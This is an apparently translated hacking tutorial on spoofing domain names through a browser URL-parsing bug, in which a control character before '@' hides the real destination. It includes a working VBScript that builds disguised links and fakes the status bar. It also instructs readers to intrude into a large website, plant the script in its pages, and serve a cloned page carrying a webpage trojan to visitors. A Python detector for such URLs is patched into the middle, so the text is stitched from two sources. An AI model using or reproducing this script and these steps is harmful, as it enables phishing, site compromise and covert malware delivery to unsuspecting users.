Domain Name spoofing technology implementation process

Source: Internet
Author: User

Planting web Trojans has always had one big problem: deceiving the user takes skill and time. It no longer has to be that difficult. This article shows how to use the latest browser vulnerabilities to spoof domain names.

Preface

Domain Name spoofing has multiple implementation methods. This article describes how to use client browser vulnerabilities to spoof users.

This vulnerability exists in most browsers, and no patches are available for the moment. The vulnerability is as follows:
When a user opens a URL constructed in the following format, the browser actually loads the constructed malicious page, while the address bar of the user's browser displays a false URL:

The URL construction format is:
http://[url_1][special_char]@[url_2]

Note:

url_1 is the address seen by the user. It cannot contain "/".
special_char is a special character, that is, the character with an ASCII code of 1.
url_2 is the malicious page address.
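
A defensive check for the URL format described above, as an added example that is not part of the original article: it flags links whose userinfo part (the text before "@") contains control characters or reads like a host name, and reports the host that is actually contacted. The function name, reason labels and sample URLs are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Host-shaped text: dot-separated labels, optionally followed by a port.
HOSTLIKE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}(?::\d+)?$", re.I)


def is_control(ch):
    """True for C0 control characters and DEL."""
    return ord(ch) < 0x20 or ord(ch) == 0x7F


def check_url(url):
    """Return (decoy, real_host, reasons) for a suspicious URL, else None."""
    parts = urlsplit(url)
    if "@" not in parts.netloc:
        return None                      # no userinfo, nothing to misread
    # Everything before the last "@" is userinfo; decode %01-style escapes.
    userinfo = unquote(parts.netloc.rpartition("@")[0])
    reasons = []
    # Control characters (raw or percent-encoded) never belong in userinfo.
    if any(is_control(c) for c in userinfo):
        reasons.append("control-char-in-userinfo")
    # What remains once control characters are dropped is what a user reads.
    visible = "".join(c for c in userinfo if not is_control(c))
    if HOSTLIKE.match(visible):
        reasons.append("userinfo-looks-like-host")
    if not reasons:
        return None
    return visible, parts.hostname, reasons


# Constructed sample inputs (hypothetical mail-gateway or proxy-log entries).
SAMPLES = [
    "http://www.163.com\x01@www.google.com/",   # raw ASCII 1, as in the article
    "http://www.163.com%01@www.google.com/",    # same character, percent-encoded
    "http://www.163.com@www.google.com/",       # host-shaped userinfo, no control char
    "http://user:secret@intranet.example/",     # ordinary credentials
    "http://www.163.com/",                      # plain URL
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(repr(sample), "->", check_url(sample))
```
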

Exploitation process

First, see the test page:

<html>
<head>
<title>Domain name spoofing technology instance</title>
</head>
<body link="#0000ff" alink="#0000ff" vlink="#0000ff">
You can see the differences between the two links:<br>
<h1>Link 1: <script language="VBScript" src="deceive.vbs"></script></h1>
<h1>Link 2: <a href="http://www.163.com/" target="_blank">www.163.com</a></h1>
</body>
</html>

In the source code of this webpage, link 1 points to a VBS script, and link 2 points to the 163 site. Suppose we change the VBS script behind link 1 to the following code:

''' deceive.vbs ''''''''''''''''''''''''''''''''''''''''''''''
' (Please modify the following according to your actual situation.)
url1 = "www.163.com"
url2 = "www.google.com"
text = "http://www.163.com/"
' Format described above: http://[url_1][special_char]@[url_2]
url = "http://" & url1 & Chr(1) & "@" & url2 & ""
dn = "/"
' Status bar text shown while the mouse is over the link
mouseover = "onmouseover=""javascript:window.status='http://" & url1 & dn & "'"""
mouseout = "onmouseout=""javascript:window.status=''"""
click = "onclick=""javascript:navigate('" & url & "')"""
style = "style=""cursor:hand"""
tag = "<span " & style & " " & mouseover & " " & mouseout & " " & click & "><font color=""#0000ff""><u>" & text & "</u></font></span>"
document.write tag
' Note:
' url1 is the address used to fool the user.
' url2 is the actual access address, such as webpage Trojans and malicious webpages.
' text is the link text.
' Note: you cannot add "http://" to the spoofing address or the actual address.
''' Cut here '''''''''''''''''''''''''''''''''''''''''''''''''

Now you can see it: when we click link 1 on this test page, it goes to Google.com, while the status bar and address bar display "http://www.163.com/". Link 2 points to 163.com. This may seem incredible, but it is the charm of the domain name spoofing vulnerability.

As we can imagine, if Link 1 on the above test page points to a webpage trojan instead of Google.com ......

However, no one will see this on an ordinary personal website. Therefore, we need to add this fake link to the pages of other large websites. Suppose we intrude into a relatively large website, such as Netease (Wow ~ at this point a cainiao pushing a cart looks at me ......). At this point, its page can be changed.

For example, if there is a text link, we can change "<a href="xxxxx.htm">xxxxxx</a>" in the code to our own code: "<script language="VBScript" src="deceive.vbs"></script>". Do you see deceive.vbs in the src attribute? Edit that file and upload it to the directory of the page to be modified.

This is not enough. We also need to modify the interface of our Trojan webpage. That is, the content of the page that was originally linked has to be added to our own Trojan page, and all the links in the Trojan page should be the same as on the original page; otherwise, the user may become suspicious. Now, we copy all the source code of the Google homepage and add it to our webpage Trojan. Modify the images in the copied code to point to the linked files, such as logo.gif to /uploadfiles/newsphoto/folder. After modification, save the file and upload it to your webpage space.

So far, our work has been completed. Have a cup of coffee and have a rest ......

When we enter this website and click the link we modified, we find that the page is almost the same as the original page (of course, there are some subtle differences, but they are generally difficult to perceive). When someone browses this webpage, they get the Trojan without being aware of it, and you smile happily! Haha
